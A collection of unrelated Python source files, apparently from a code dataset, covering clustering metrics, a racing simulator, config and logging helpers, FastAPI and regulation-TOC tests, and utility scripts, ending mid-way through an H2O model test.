# query mark price
def get_mark_price(self, instrument_id):
return self._request_without_params(GET, FUTURE_MARK + str(instrument_id) + '/mark_price')
|
22518
|
from dataclasses import dataclass
from typing import Dict
from racecar_gym.bullet import load_world, load_vehicle
from racecar_gym.tasks import Task, get_task
from racecar_gym.core import World, Agent
from .specs import ScenarioSpec, TaskSpec
def task_from_spec(spec: TaskSpec) -> Task:
task = get_task(spec.task_name)
return task(**spec.params)
@dataclass
class MultiAgentScenario:
world: World
agents: Dict[str, Agent]
@staticmethod
def from_spec(path: str, rendering: bool = None) -> 'MultiAgentScenario':
spec = ScenarioSpec()
spec.load(path)
if rendering:
spec.world.rendering = rendering
agents = dict([
(s.id, Agent(id=s.id, vehicle=load_vehicle(s.vehicle), task=task_from_spec(s.task)))
for s in spec.agents
])
return MultiAgentScenario(world=load_world(spec.world, agents=list(agents.values())), agents=agents)
@dataclass
class SingleAgentScenario:
world: World
agent: Agent
@staticmethod
def from_spec(path: str, rendering: bool = None) -> 'SingleAgentScenario':
spec = ScenarioSpec()
spec.load(path)
if rendering:
spec.world.rendering = rendering
agent_spec = spec.agents[0]
agent = Agent(id=agent_spec.id, vehicle=load_vehicle(agent_spec.vehicle), task=task_from_spec(agent_spec.task))
return SingleAgentScenario(world=load_world(spec.world, agents=[agent]), agent=agent)
|
22545
|
import sys,os
import json
import logging as log
import socket
from collections import OrderedDict
import datetime
from platform import system as system_name # Returns the system/OS name
from subprocess import call as system_call # Execute a shell command
def ping(host):
"""
Returns True if host (str) responds to a ping request.
Remember that a host may not respond to a ping (ICMP) request even if the host name is valid.
"""
# Ping command count option as function of OS
param = '-n' if system_name().lower()=='windows' else '-c'
# Building the command. Ex: "ping -c 1 google.com"
command = ['ping', param, '1', host]
# Pinging
return system_call(command) == 0
# -------------------- config --------------------
def get_local_json():
"""fetches the config.json file in the local directory
if config_hostname.json is found it is used over the default one
"""
config = None
dirname = os.path.dirname(sys.argv[0])
if(len(dirname) == 0):
dirname = "."
config_file = dirname+'/'+"config_"+socket.gethostname()+".json"
if(os.path.isfile(config_file)):
print("loading: ",config_file)
config = json.load(open(config_file))
else:
config_file = dirname+'/'+"config.json"
if(os.path.isfile(config_file)):
print("loading: %s",config_file)
config = json.load(open(config_file))
else:
print("Fatal error 'config.json' not found")
return config
# -------------------- config --------------------
def get_local_nodes(nodes_file):
nodes = json.load(open(nodes_file),object_pairs_hook=OrderedDict)
return nodes
def configure_log(logger_name):
global_config = get_local_json()
config = global_config["log"]
log_level_map = {
"Debug" :10,
"Info" :20,
"Warning" :30,
"Error" :40,
"Critical" :50
}
#if(os.path.isfile(config["logfile"])):
for handler in log.root.handlers[:]:
log.root.removeHandler(handler)
log.basicConfig( filename=config["logfile"],
level=log_level_map[config["level"]],
format='%(asctime)s %(name)s %(levelname)-8s %(message)s',
datefmt='%d %H:%M:%S'
)
log.getLogger('').addHandler(log.StreamHandler())
log.info("====> '%s' started logging with level '%s' @ '%s'"%(logger_name,config["level"],str(datetime.datetime.utcnow())))
#else:
# print("Log file not available : %s"%(config["logfile"]))
return global_config
|
22611
|
import argparse, os
import lib.config as config
import lib.utils as utils
def count_present_and_missing(cls, directory, metadata):
"""
Count present and missing videos for a class based on metadata.
:param cls: The class. If None, count all videos (used for testing videos - no classes).
:param directory: Directory containing the videos.
:param metadata: Kinetics metadata json.
:return: Tuple: number present videos, number of missing videos
"""
present = 0
missing = 0
for key in metadata:
if cls is None or metadata[key]["annotations"]["label"] == cls:
if os.path.isfile(os.path.join(directory, "{}.mp4".format(key))):
present += 1
else:
missing += 1
return present, missing
def main(args):
# load video classes
classes = utils.load_json(config.CLASSES_PATH)
# load lists of videos
train_metadata = utils.load_json(config.TRAIN_METADATA_PATH)
val_metadata = utils.load_json(config.VAL_METADATA_PATH)
test_metadata = utils.load_json(config.TEST_METADATA_PATH)
num_found = 0
total = 0
total_train_present = 0
total_train_missing = 0
total_val_present = 0
total_val_missing = 0
# load subset
subset = None
if args.subset:
subset = utils.load_json(args.subset)
# count train and validation videos
for cls in classes:
if subset is not None and cls not in subset:
continue
total += 1
cls_train_path = os.path.join(config.TRAIN_ROOT, cls.replace(" ", "_"))
cls_valid_path = os.path.join(config.VALID_ROOT, cls.replace(" ", "_"))
train_found = False
valid_found = False
if os.path.isdir(cls_train_path):
train_present, train_missing = count_present_and_missing(cls, cls_train_path, train_metadata)
train_found = True
total_train_present += train_present
total_train_missing += train_missing
if os.path.isdir(cls_valid_path):
valid_present, valid_missing = count_present_and_missing(cls, cls_valid_path, val_metadata)
valid_found = True
total_val_present += valid_present
total_val_missing += valid_missing
if train_found or valid_found:
num_found += 1
if args.details:
print("class {}".format(cls))
if train_found:
print("train: {} / {}".format(train_present, train_present + train_missing))
if valid_found:
print("valid: {} / {}".format(valid_present, valid_present + valid_missing))
print()
# count test videos
test_present, test_missing = count_present_and_missing(None, config.TEST_ROOT, test_metadata)
# print
train_percent_found = 0
if total_train_present > 0:
train_percent_found = (total_train_present * 100) / (total_train_present + total_train_missing)
valid_percent_found = 0
if total_val_present > 0:
valid_percent_found = (total_val_present * 100) / (total_val_present + total_val_missing)
test_percent_found = 0
if test_present > 0:
test_percent_found = (test_present * 100) / (test_present + test_missing)
print("class stats:")
print("\t{:d} / {:d} classes found".format(num_found, total))
print()
print("video stats (only for found classes):")
print("\t{:d} / {:d} ({:.2f}%) train videos found".format(
total_train_present, total_train_present + total_train_missing, train_percent_found))
print("\t{:d} / {:d} ({:.2f}%) valid videos found".format(
total_val_present, total_val_present + total_val_missing, valid_percent_found))
print("\t{:d} / {:d} ({:.2f}%) test videos found".format(
test_present, test_present + test_missing, test_percent_found))
if __name__ == "__main__":
parser = argparse.ArgumentParser("Print statistics about downloaded videos.")
parser.add_argument("-d", "--details", action="store_true", default=False, help="detailed stats for each found class")
parser.add_argument("-s", "--subset", help="path to a JSON file containing a subset of Kinetics classes")
parsed = parser.parse_args()
main(parsed)
|
22617
|
import shutil
import pathlib
asset_dirs = ["artifacts/main", "artifacts/build_python_version"]
pathlib.Path("distfiles").mkdir(exist_ok=True)
for asset_dir in asset_dirs:
for fname in list(pathlib.Path(asset_dir).glob('**/RobotRaconteur-*-MATLAB*')):
print(fname)
dest = pathlib.Path(fname)
shutil.copy(str(fname),"distfiles/" + dest.name)
|
22620
|
import numpy as np
from cdlib.evaluation.internal import onmi
from cdlib.evaluation.internal.omega import Omega
from nf1 import NF1
from collections import namedtuple, defaultdict
__all__ = [
"MatchingResult",
"normalized_mutual_information",
"overlapping_normalized_mutual_information_LFK",
"overlapping_normalized_mutual_information_MGH",
"omega",
"f1",
"nf1",
"adjusted_rand_index",
"adjusted_mutual_information",
"variation_of_information",
"partition_closeness_simple",
]
# MatchingResult = namedtuple("MatchingResult", ['mean', 'std'])
MatchingResult = namedtuple("MatchingResult", "score std")
MatchingResult.__new__.__defaults__ = (None,) * len(MatchingResult._fields)
def __check_partition_coverage(first_partition: object, second_partition: object):
nodes_first = {
node: None for community in first_partition.communities for node in community
}
nodes_second = {
node: None for community in second_partition.communities for node in community
}
if len(set(nodes_first.keys()) ^ set(nodes_second.keys())) != 0:
raise ValueError("Both partitions should cover the same node set")
def __check_partition_overlap(first_partition: object, second_partition: object):
if first_partition.overlap or second_partition.overlap:
raise ValueError("Not defined for overlapping partitions")
def normalized_mutual_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""
Normalized Mutual Information between two clusterings.
Normalized Mutual Information (NMI) is an normalization of the Mutual
Information (MI) score to scale the results between 0 (no mutual
information) and 1 (perfect correlation). In this function, mutual
information is normalized by ``sqrt(H(labels_true) * H(labels_pred))``
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.normalized_mutual_information(louvain_communities,leiden_communities)
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import normalized_mutual_info_score
return MatchingResult(
score=normalized_mutual_info_score(first_partition_c, second_partition_c)
)
def overlapping_normalized_mutual_information_LFK(
first_partition: object, second_partition: object
) -> MatchingResult:
"""
Overlapping Normalized Mutual Information between two clusterings.
Extension of the Normalized Mutual Information (NMI) score to cope with overlapping partitions.
This is the version proposed by Lancichinetti et al. (1)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.overlapping_normalized_mutual_information_LFK(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2009). Detecting the overlapping and hierarchical community structure in complex networks. New Journal of Physics, 11(3), 033015.
"""
return MatchingResult(
score=onmi.onmi(
[set(x) for x in first_partition.communities],
[set(x) for x in second_partition.communities],
)
)
def overlapping_normalized_mutual_information_MGH(
first_partition: object, second_partition: object, normalization: str = "max"
) -> MatchingResult:
"""
Overlapping Normalized Mutual Information between two clusterings.
Extension of the Normalized Mutual Information (NMI) score to cope with overlapping partitions.
This is the version proposed by McDaid et al. using a different normalization than the original LFR one. See ref.
for more details.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:param normalization: one of "max" or "LFK". Default "max" (corresponds to the main method described in the article)
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.overlapping_normalized_mutual_information_MGH(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2011). Normalized mutual information to evaluate overlapping community finding algorithms. arXiv preprint arXiv:1110.2515. Chicago
"""
if normalization == "max":
variant = "MGH"
elif normalization == "LFK":
variant = "MGH_LFK"
else:
raise ValueError(
"Wrong 'normalization' value. Please specify one among [max, LFK]."
)
return MatchingResult(
score=onmi.onmi(
[set(x) for x in first_partition.communities],
[set(x) for x in second_partition.communities],
variant=variant,
)
)
def omega(first_partition: object, second_partition: object) -> MatchingResult:
"""
Index of resemblance for overlapping, complete coverage, network clusterings.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.omega(louvain_communities,leiden_communities)
:Reference:
1. <NAME>, <NAME>, and <NAME>. 2012. `Using the omega index for evaluating abstractive algorithms detection. <https://pdfs.semanticscholar.org/59d6/5d5aa09d789408fd9fd3c009a1b070ff5859.pdf/>`_ In Proceedings of Workshop on Evaluation Metrics and System Comparison for Automatic Summarization. Association for Computational Linguistics, Stroudsburg, PA, USA, 10-18.
"""
__check_partition_coverage(first_partition, second_partition)
first_partition = {k: v for k, v in enumerate(first_partition.communities)}
second_partition = {k: v for k, v in enumerate(second_partition.communities)}
om_idx = Omega(first_partition, second_partition)
return MatchingResult(score=om_idx.omega_score)
def f1(first_partition: object, second_partition: object) -> MatchingResult:
"""
Compute the average F1 score of the optimal algorithms matches among the partitions in input.
Works on overlapping/non-overlapping complete/partial coverage partitions.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.f1(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2016). `A novel approach to evaluate algorithms detection internal on ground truth. <https://www.researchgate.net/publication/287204505_A_novel_approach_to_evaluate_community_detection_algorithms_on_ground_truth/>`_ In Complex Networks VII (pp. 133-144). Springer, Cham.
"""
nf = NF1(first_partition.communities, second_partition.communities)
results = nf.summary()
return MatchingResult(
score=results["details"]["F1 mean"][0], std=results["details"]["F1 std"][0]
)
def nf1(first_partition: object, second_partition: object) -> MatchingResult:
"""
Compute the Normalized F1 score of the optimal algorithms matches among the partitions in input.
Works on overlapping/non-overlapping complete/partial coverage partitions.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.nf1(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2016). `A novel approach to evaluate algorithms detection internal on ground truth. <https://www.researchgate.net/publication/287204505_A_novel_approach_to_evaluate_community_detection_algorithms_on_ground_truth/>`_
2. <NAME>. (2017). : `RDyn: graph benchmark handling algorithms dynamics. Journal of Complex Networks. <https://academic.oup.com/comnet/article-abstract/5/6/893/3925036?redirectedFrom=PDF/>`_ 5(6), 893-912.
"""
nf = NF1(first_partition.communities, second_partition.communities)
results = nf.summary()
return MatchingResult(score=results["scores"].loc["NF1"][0])
def adjusted_rand_index(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Rand index adjusted for chance.
The Rand Index computes a similarity measure between two clusterings
by considering all pairs of samples and counting pairs that are
assigned in the same or different clusters in the predicted and
true clusterings.
The raw RI score is then "adjusted for chance" into the ARI score
using the following scheme::
ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)
The adjusted Rand index is thus ensured to have a value close to
0.0 for random labeling independently of the number of clusters and
samples and exactly 1.0 when the clusterings are identical (up to
a permutation).
ARI is a symmetric measure::
adjusted_rand_index(a, b) == adjusted_rand_index(b, a)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.adjusted_rand_index(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., & <NAME>. (1985). `Comparing partitions. <https://link.springer.com/article/10.1007/BF01908075/>`_ Journal of classification, 2(1), 193-218.
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import adjusted_rand_score
return MatchingResult(
score=adjusted_rand_score(first_partition_c, second_partition_c)
)
def adjusted_mutual_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Adjusted Mutual Information between two clusterings.
Adjusted Mutual Information (AMI) is an adjustment of the Mutual
Information (MI) score to account for chance. It accounts for the fact that
the MI is generally higher for two clusterings with a larger number of
clusters, regardless of whether there is actually more information shared.
For two clusterings :math:`U` and :math:`V`, the AMI is given as::
AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [max(H(U), H(V)) - E(MI(U, V))]
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Be mindful that this function is an order of magnitude slower than other
metrics, such as the Adjusted Rand Index.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.adjusted_mutual_information(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2010). `Information theoretic measures for clusterings comparison: Variants, properties, normalization and correction for chance. <http://jmlr.csail.mit.edu/papers/volume11/vinh10a/vinh10a.pdf/>`_ Journal of Machine Learning Research, 11(Oct), 2837-2854.
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import adjusted_mutual_info_score
return MatchingResult(
score=adjusted_mutual_info_score(first_partition_c, second_partition_c)
)
def variation_of_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Variation of Information among two nodes partitions.
$$ H(p)+H(q)-2MI(p, q) $$
where MI is the mutual information, H the partition entropy and p,q are the algorithms sets
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.variation_of_information(louvain_communities,leiden_communities)
:Reference:
1. Meila, M. (2007). `Comparing clusterings - an information based distance. <https://www.sciencedirect.com/science/article/pii/S0047259X06002016/>`_ Journal of Multivariate Analysis, 98, 873-895. doi:10.1016/j.jmva.2006.11.013
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
n = float(sum([len(c1) for c1 in first_partition.communities]))
sigma = 0.0
for c1 in first_partition.communities:
p = len(c1) / n
for c2 in second_partition.communities:
q = len(c2) / n
r = len(set(c1) & set(c2)) / n
if r > 0.0:
sigma += r * (np.log2(r / p) + np.log2(r / q))
return MatchingResult(score=abs(sigma))
def partition_closeness_simple(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Community size density closeness.
Simple implementation that does not leverage kernel density estimator.
$$ S_G(A,B) = \frac{1}{2} \Sum_{i=1}^{r}\Sum_{j=1}^{s} min(\frac{n^a(x^a_i)}{N^a}, \frac{n^b_j(x^b_j)}{N^b}) \delta(x_i^a,x_j^b) $$
where:
$$ N^a $$ total number of communities in A of any size;
$$ x^a $$ ordered list of community sizes for A;
$$ n^a $$ multiplicity of community sizes for A.
(symmetrically for B)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.partition_closeness_simple(louvain_communities,leiden_communities)
:Reference:
1. Dao, Vinh-Loc, <NAME>, and <NAME>. "Estimating the similarity of community detection methods based on cluster size distribution." International Conference on Complex Networks and their Applications. Springer, Cham, 2018.
"""
coms_a = sorted(list(set([len(c) for c in first_partition.communities])))
freq_a = defaultdict(int)
for a in coms_a:
freq_a[a] += 1
freq_a = [freq_a[a] for a in sorted(freq_a)]
n_a = sum([coms_a[i] * freq_a[i] for i in range(0, len(coms_a))])
coms_b = sorted(list(set([len(c) for c in second_partition.communities])))
freq_b = defaultdict(int)
for b in coms_b:
freq_b[b] += 1
freq_b = [freq_b[b] for b in sorted(freq_b)]
n_b = sum([coms_b[i] * freq_b[i] for i in range(0, len(coms_b))])
closeness = 0
for i in range(0, len(coms_a)):
for j in range(0, len(coms_b)):
if coms_a[i] == coms_b[j]:
closeness += min(
(coms_a[i] * freq_a[i]) / n_a, (coms_b[j] * freq_b[j]) / n_b
)
closeness *= 0.5
return MatchingResult(score=closeness)
|
22622
|
from typing import Optional
import pytest
from fastapi import FastAPI, Header
from fastapi.testclient import TestClient
from meiga import BoolResult, Failure, isFailure, isSuccess
from petisco import NotFound, assert_http
from petisco.extra.fastapi import FastAPIController
app = FastAPI(title="test-app")
result_from_expected_behavior = {
"success": isSuccess,
"failure_generic": isFailure,
"failure_not_found": Failure(NotFound()),
}
class MyController(FastAPIController):
def execute(self, expected_behavior: str) -> BoolResult:
return result_from_expected_behavior.get(expected_behavior, isSuccess)
@app.get("/test")
def entry_point(x_behavior: Optional[str] = Header("success")):
return MyController().execute(x_behavior)
@pytest.mark.unit
@pytest.mark.parametrize(
"behavior,expected_status_code",
[("success", 200), ("failure_generic", 500), ("failure_not_found", 404)],
)
def test_fastapi_app_with_controller_should_return_expected_values(
behavior, expected_status_code
):
with TestClient(app) as client:
response = client.get("/test", headers={"x-behavior": behavior})
assert_http(response, expected_status_code)
|
22629
|
from Point import Point
import Constant as c
from GeometryMath import bisector_point
class Bisector(Point):
def __init__(self, item):
"""Construct Bisector."""
Point.__init__(self, item)
self.item["sub_type"] = c.Point.Definition.BISECTOR
def tikzify(self):
return '\\tkzDefLine[bisector](%s,%s,%s)\\tkzGetPoint{%s}' % (self.item["definition"]["A"],
self.item["definition"]["B"],
self.item["definition"]["C"],
self.get_id())
def recompute_canvas(self, items, window, width, height):
A = items[self.depends_on()[0]].get_canvas_coordinates()
B = items[self.depends_on()[1]].get_canvas_coordinates()
C = items[self.depends_on()[2]].get_canvas_coordinates()
self.set_canvas_coordinates(*bisector_point(A, B, C))
def __str__(self):
return "Bisector point (%s) of angle %s"\
% (self.item["id"], self.item["definition"]["A"]+self.item["definition"]["B"]+self.item["definition"]["C"])
def definition_builder(self, data, items=None):
if len(data) == 3:
return dict(zip(["A", "B", "C"], data))
def parse_into_definition(self, arguments, items):
# arguments length condition
if len(arguments) != 3:
return None
# all arguments are members of the regular expression for argument name
if not all(map(lambda x: self.name_pattern(x), arguments)):
return None
# all arguments are items that already exist
if not all(map(lambda x: x in items, arguments)):
return None
# the type of all arguments is of a certain type
if not all(map(lambda x: items[x].item["type"] == 'point', arguments)):
return None
# self-reference condition (self-reference is not permitted)
if self.get_id() in arguments:
return None
# condition for cross reference
for id in arguments:
deep_depends = items[id].deep_depends_on(items)
if self.get_id() in deep_depends:
return None
return self.definition_builder(arguments)
@staticmethod
def static_patterns():
return ["ppp"]
def patterns(self):
return ["ppp"]
|
22663
|
from ._base import *
DEBUG = False
WEBSITE_URL = "https://example.com" # without trailing slash
MEDIA_URL = f"{WEBSITE_URL}/media/"
|
22689
|
from unittest import TestCase
from regulations.generator.layers.toc_applier import *
class TableOfContentsLayerTest(TestCase):
def test_section(self):
toc = TableOfContentsLayer(None)
el = {}
toc.section(el, {'index': ['1']})
self.assertEqual({}, el)
toc.section(el, {'index': ['1', '2', '3']})
self.assertEqual({}, el)
toc.section(el, {'index': ['1', 'B']})
self.assertEqual({}, el)
toc.section(el, {'index': ['1', 'Interpretations']})
self.assertEqual({}, el)
toc.section(el, {'index': ['1', '2'], 'title': '1.2 - Awesome'})
self.assertEqual(el, {
'is_section': True,
'section_id': '1-2',
'label': '1.2',
'sub_label': 'Awesome'
})
toc.section(el, {'index': ['2', '1'], 'title': '2.1Sauce'})
self.assertEqual(el, {
'is_section': True,
'section_id': '2-1',
'label': '2.1',
'sub_label': 'Sauce'
})
def test_appendix_supplement(self):
toc = TableOfContentsLayer(None)
el = {}
toc.appendix_supplement(el, {'index': ['1']})
self.assertEqual({}, el)
toc.appendix_supplement(el, {'index': ['1', '2', '3']})
self.assertEqual({}, el)
toc.appendix_supplement(el, {'index': ['1', 'B', '3']})
self.assertEqual({}, el)
toc.appendix_supplement(el, {'index': ['1', 'Interp', '3']})
self.assertEqual({}, el)
toc.appendix_supplement(el, {
'index': ['1', 'B'],
'title': 'Appendix B - Bologna'})
self.assertEqual(el, {
'is_appendix': True,
'is_first_appendix': True,
'label': 'Appendix B',
'sub_label': 'Bologna',
'section_id': '1-B'
})
el = {}
toc.appendix_supplement(el, {
'index': ['204', 'A'],
'title': 'Appendix A to Part 204 - Model Forms'})
self.assertEqual(el, {
'is_appendix': True,
'is_first_appendix': True,
'label': 'Appendix A to Part 204',
'sub_label': 'Model Forms',
'section_id': '204-A'
})
el = {}
toc.appendix_supplement(el, {
'index': ['1', 'Interp'],
'title': 'Supplement I to 8787 - I am Iron Man'})
self.assertEqual(el, {
'is_supplement': True,
'label': 'Supplement I to 8787',
'sub_label': 'I am Iron Man',
'section_id': '1-Interp'
})
def test_apply_layer_url(self):
toc = TableOfContentsLayer({'100': [
{'title': '100.1 Intro', 'index': ['100', '1']}]})
result = toc.apply_layer('100')
self.assertEqual('#100-1', result[1][0]['url'])
toc.sectional = True
toc.version = 'verver'
result = toc.apply_layer('100')
self.assertTrue('100-1/verver#100-1' in result[1][0]['url'])
def test_apply_layer_compatibility(self):
toc = TableOfContentsLayer({'100': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': 'Appendix A', 'index': ['100', 'A']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}]})
_, result = toc.apply_layer('100')
self.assertEqual(3, len(result))
toc = TableOfContentsLayer({
'100': [
{'title': 'Subpart A', 'index': ['100', 'Subpart', 'A']},
{'title': 'Appendix A', 'index': ['100', 'A']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}],
'100-Subpart-A': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': '100.2 Sec2', 'index': ['100', '2']},
{'title': '100.3 Sec3', 'index': ['100', '3']}]
})
_, result = toc.apply_layer('100')
self.assertEqual(3, len(result))
self.assertEqual(3, len(result[0]['sub_toc']))
def test_apply_layer_first_appendix(self):
toc = TableOfContentsLayer({'100': [
{'title': 'Appendix A', 'index': ['100', 'A']},
{'title': 'Appendix B', 'index': ['100', 'B']},
{'title': 'Appendix C', 'index': ['100', 'C']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}]})
_, result = toc.apply_layer('100')
self.assertEqual(4, len(result))
aA, aB, aC, sI = result
self.assertTrue(aA['is_first_appendix'])
self.assertFalse(aB['is_first_appendix'])
self.assertFalse(aC['is_first_appendix'])
self.assertFalse(sI.get('is_first_appendix', False))
toc = TableOfContentsLayer({'100': [
{'title': 'Supplement I', 'index': ['100', 'Interp']}]})
_, result = toc.apply_layer('100')
self.assertEqual(1, len(result))
self.assertFalse(result[0].get('is_first_appendix', False))
def test_apply_layer_interp_emptysubpart(self):
toc = TableOfContentsLayer({'100': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': '100.2 Second', 'index': ['100', '2']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}]})
_, result = toc.apply_layer('100')
self.assertEqual(3, len(result))
s1, s2, interp = result
self.assertEqual(1, len(interp['sub_toc']))
nosubpart = interp['sub_toc'][0]
self.assertEqual('Regulation Text', nosubpart['label'])
self.assertEqual(['100', 'Subpart', 'Interp'], nosubpart['index'])
toc = TableOfContentsLayer({'100': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': '100.2 Second', 'index': ['100', '2']},
{'title': 'Appendix A', 'index': ['100', 'A']},
{'title': 'Appendix C', 'index': ['100', 'C']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}]})
_, result = toc.apply_layer('100')
self.assertEqual(5, len(result))
s1, s2, appA, appC, interp = result
self.assertEqual(2, len(interp['sub_toc']))
nosubpart, appendices = interp['sub_toc']
self.assertEqual('Regulation Text', nosubpart['label'])
self.assertEqual(['100', 'Subpart', 'Interp'], nosubpart['index'])
self.assertEqual('Appendices', appendices['label'])
self.assertEqual(['100', 'Appendices', 'Interp'], appendices['index'])
def test_apply_layer_interp_subparts(self):
toc = TableOfContentsLayer({
'100': [
{'title': 'Subpart A', 'index': ['100', 'Subpart', 'A']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}],
'100-Subpart-A': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': '100.2 Second', 'index': ['100', '2']}]})
_, result = toc.apply_layer('100')
self.assertEqual(2, len(result))
subpartA, interp = result
self.assertEqual(2, len(subpartA['sub_toc']))
self.assertEqual(1, len(interp['sub_toc']))
nosubpart = interp['sub_toc'][0]
self.assertEqual('Subpart A', nosubpart['label'])
self.assertEqual(['100', 'Subpart', 'A', 'Interp'], nosubpart['index'])
toc = TableOfContentsLayer({
'100': [
{'title': 'Subpart A', 'index': ['100', 'Subpart', 'A']},
{'title': 'Appendix A', 'index': ['100', 'A']},
{'title': 'Appendix C', 'index': ['100', 'C']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}],
'100-Subpart-A': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': '100.2 Second', 'index': ['100', '2']}]})
_, result = toc.apply_layer('100')
self.assertEqual(4, len(result))
subpartA, appA, appC, interp = result
self.assertEqual(2, len(interp['sub_toc']))
nosubpart, appendices = interp['sub_toc']
self.assertEqual('Subpart A', nosubpart['label'])
self.assertEqual(['100', 'Subpart', 'A', 'Interp'], nosubpart['index'])
self.assertEqual('Appendices', appendices['label'])
self.assertEqual(['100', 'Appendices', 'Interp'], appendices['index'])
|
22741
|
import sys
sys.path.insert(1,"../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.gbm import H2OGradientBoostingEstimator
from h2o.utils.model_utils import reset_model_threshold
def test_reset_threshold():
"""
Test the model threshold can be reset.
Performance metric should be recalculated and also predictions should be changed based on the new threshold.
"""
# import data
airlines = h2o.import_file(path=pyunit_utils.locate("smalldata/airlines/modified_airlines.csv"))
# convert columns to factors
airlines["Year"] = airlines["Year"].asfactor()
airlines["Month"] = airlines["Month"].asfactor()
airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
airlines["Cancelled"] = airlines["Cancelled"].asfactor()
airlines['FlightNum'] = airlines['FlightNum'].asfactor()
# set the predictor names and the response column name
